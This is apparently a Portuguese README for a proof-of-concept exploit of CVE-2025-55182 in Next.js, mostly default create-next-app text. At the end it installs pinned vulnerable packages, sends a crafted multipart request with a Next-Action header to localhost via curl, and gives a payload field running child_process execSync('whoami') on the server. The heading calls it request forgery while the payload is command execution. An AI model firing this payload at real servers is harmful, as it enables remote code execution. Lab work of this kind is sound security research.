
Exploit de prova de conceito para CVE-2025-55182 que visa falsificação de solicitação do lado do servidor em Next.js por meio de requisições multipartes manipuladas com manipulação do cabeçalho Next-Action.
Este é um projeto Next.js inicializado com create-next-app.
Primeiro, execute o servidor de desenvolvimento:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Abra http://localhost:3000 no seu navegador para ver o resultado.
Você pode começar a editar a página modificando app/page.tsx. A página é atualizada automaticamente conforme você edita o arquivo.
Este projeto usa next/font para otimizar e carregar automaticamente Geist, uma nova família de fontes para Vercel.
Para saber mais sobre Next.js, confira os seguintes recursos:
Você pode conferir o repositório Next.js no GitHub - seus comentários e contribuições são bem-vindos!
A maneira mais fácil de implantar seu aplicativo Next.js é usar a Plataforma Vercel dos criadores do Next.js.
Confira nossa documentação de implantação do Next.js para mais detalhes.
npx create-next-app@latest react-vuln-lab
npm install [email protected] [email protected] [email protected] --legacy-peer-deps
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
- "_prefix": "require('child_process').execSync('whoami').toString()"